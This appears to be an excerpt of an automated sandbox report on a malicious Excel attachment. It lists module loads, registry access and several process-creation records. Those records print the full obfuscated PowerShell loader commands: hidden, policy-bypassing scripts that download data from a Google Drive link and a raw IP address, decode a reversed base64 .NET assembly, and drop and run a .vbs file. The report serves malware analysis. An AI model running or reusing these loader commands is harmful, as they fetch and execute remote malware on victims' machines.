          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wow64win.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: mozglue.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: dbghelp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: msvcp140.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: vcruntime140.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: ucrtbase.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: winmm.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wsock32.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: vaultcli.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: netapi32.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: netutils.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: srvcli.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wkscli.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: samcli.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: samlib.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: dnsapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.pdbhP source: powershell.exe, 00000011.00000002.484734219.00000000027FA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.pdbhP source: powershell.exe, 00000005.00000002.457385625.00000000023D1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.pdb source: powershell.exe, 00000011.00000002.484734219.00000000027FA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.pdb source: powershell.exe, 00000005.00000002.457385625.00000000023D1000.00000004.00000800.00020000.00000000.sdmp
          Source: 20430000.0.drInitial sample: OLE indicators vbamacros = False
          Source: PO.2407010.xlsInitial sample: OLE indicators encrypted = True

          Data Obfuscation

          barindex
          Obfuscated command line found
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
          Suspicious powershell command line found
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
